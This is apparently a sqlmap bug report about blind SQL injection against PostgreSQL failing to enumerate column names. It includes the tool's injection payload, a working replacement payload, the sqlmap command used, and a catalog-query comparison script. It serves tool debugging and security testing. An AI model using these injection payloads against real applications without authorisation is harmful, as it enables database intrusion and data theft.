Describe the bug
Issue initially reported here but wrongly explained as if it was failing in all cases. Hopefully this is explained more clearly.
There is at least one scenario where sqlmap is not able to extract column names while exploiting boolean-based blind SQLi in PostgreSQL. It works smoothly for extracting database names, user, hostname, etc. Checking the verbose mode, the payload seems not to be working correctly in some cases. I'm wondering whether the way the tables are joined in the payload works in all cases.
sqlmap payload
' AND ASCII(SUBSTRING((SELECT COUNT(attname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON pg_class.oid=pg_attribute.attrelid WHERE pg_class.relnamespace=pg_namespace.oid AND pg_type.oid=pg_attribute.atttypid AND attnum>0 AND pg_class.relname='<table_name>' AND nspname='<schema_name>')::text FROM 1 FOR 1))>0 AND 'CxED'='CxED
working payload (in my case)
' AND ASCII(SUBSTRING((SELECT COUNT(attname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='<table_name>' AND nspname='<schema_name>' LIMIT 1)::text FROM 1 FOR 1))>0 AND 'CxED'='CxED
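For anyone wanting to compare the two join forms directly in psql rather than through the injection wrapper, the following is an added reproduction script (not part of this report and not sqlmap's own code). It creates a throw-away schema and table with constructed names and runs the inner SELECT of each payload against the system catalogs; the placeholder `<table_name>` and `<schema_name>` values are replaced by the constructed `repro_schema` / `repro_table`, and everything else is taken verbatim from the two payloads above.

```sql
-- Added reproduction harness: throw-away objects with constructed names.
CREATE SCHEMA repro_schema;
CREATE TABLE repro_schema.repro_table (
    id         integer,
    name       text,
    created_at timestamptz
);

-- Inner query of the sqlmap payload: an implicit cross join of pg_namespace and
-- pg_type mixed with an explicit JOIN, where the aliased tables (b, a) are
-- referred to by their unaliased names in the ON clause.
SELECT COUNT(attname)
FROM pg_namespace, pg_type, pg_attribute b
JOIN pg_class a ON pg_class.oid = pg_attribute.attrelid
WHERE pg_class.relnamespace = pg_namespace.oid
  AND pg_type.oid = pg_attribute.atttypid
  AND attnum > 0
  AND pg_class.relname = 'repro_table'
  AND nspname = 'repro_schema';

-- Inner query of the reporter's working payload: explicit JOINs only, with the
-- aliases (a, b, c, d) used consistently in every ON and WHERE condition.
SELECT COUNT(attname)
FROM pg_attribute b
JOIN pg_class a     ON a.oid = b.attrelid
JOIN pg_type c      ON c.oid = b.atttypid
JOIN pg_namespace d ON a.relnamespace = d.oid
WHERE b.attnum > 0
  AND a.relname = 'repro_table'
  AND nspname = 'repro_schema'
LIMIT 1;

-- Clean up the constructed objects.
DROP SCHEMA repro_schema CASCADE;
```

Run it against a disposable database as a role that may create schemas. Both statements are meant to count the user columns of `repro_table` (attnum > 0 excludes system columns), so they should agree; an error or a differing count from the first form on a given PostgreSQL version is exactly the kind of difference this report is asking about, and the server version should be noted alongside the result.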
To Reproduce
It is hard to reproduce as the difference is in the database side and I can't provide an example (as it is a private app)
- Run
sqlmap -r 1.sql --force-ssl --dbs --no-cast -D <schema_name> -T <table_name> --columns --technique B -v 3
- See error
[ERROR] unable to retrieve the number of columns for table '<table_name>' in database '<schema_name>'
Let me know if you need more information; I could provide it through a private channel so as not to disclose details of the app.
Expected behavior
Be able to extract column names, the same way it extracts other information like the schema name and others.
Screenshots

Running environment:
- sqlmap version 1.2.4#stable
- Installation method: apt
- Operating system: Ubuntu 18.04
- Python version 3.6.9
Target details:
- DBMS PostgreSQL
- SQLi techniques found by sqlmap: boolean-based blind
- WAF/IPS [if any]
- Relevant console output [if any]
- Exception traceback: [ERROR] unable to retrieve the number of columns for table '<table_name>' in database '<schema_name>'
Additional context
I have performed troubleshooting with:
- --parse-errors: no new information provided by the tool
- -t traffic.txt: it performs 3 requests and none of them is returning results so all are false statements (>,<,=)
To be clear: I already have the working payload; I'm just trying to confirm and verify an issue (if any) in sqlmap, to contribute to the project. I manually tested both payloads and the one used by sqlmap doesn't work in my case.